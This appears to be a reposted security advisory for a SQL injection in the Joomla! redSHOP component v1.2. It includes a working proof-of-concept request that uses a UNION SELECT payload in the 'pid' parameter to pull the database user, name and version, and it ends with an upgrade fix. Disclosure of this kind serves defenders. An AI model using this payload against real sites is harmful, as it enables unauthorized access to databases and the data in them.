--------------------------------------------
Joomla! redSHOP component v1.2 SQL Injection
--------------------------------------------
 
== 概述 ==
- 影响产品: Joomla! redSHOP component
- 下载地址: http://redcomponent.com/redcomponent/redshop
- 开发者: redcomponent
- 影响版本:  1.2有效，其他版本可能也会有效
- 漏洞发现者: Matias Fontanini
 
== 缺陷 ==
When using the "addtocompare" task, the component does not correctly
sanitize the "pid" parameter before using it to construct SQL queries,
making it vulnerable to SQL Injection attacks.
 
The following proof of concept request retrieves the database user,
name and version:
 
http://www.2cto.com /index.php?tmpl=component&option=com_redshop&view=product&task=addtocompare&pid=24%22%20and%201=0%20union%20select%201,2,3,4,5,6,7,8,concat_ws%280x203a20,%20user%28%29,%20database%28%29,%20version%28%29%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63%23&cmd=add&cid=20&sid=0.6886686905513422
 
== 解决方案 ==
升级到1.3版本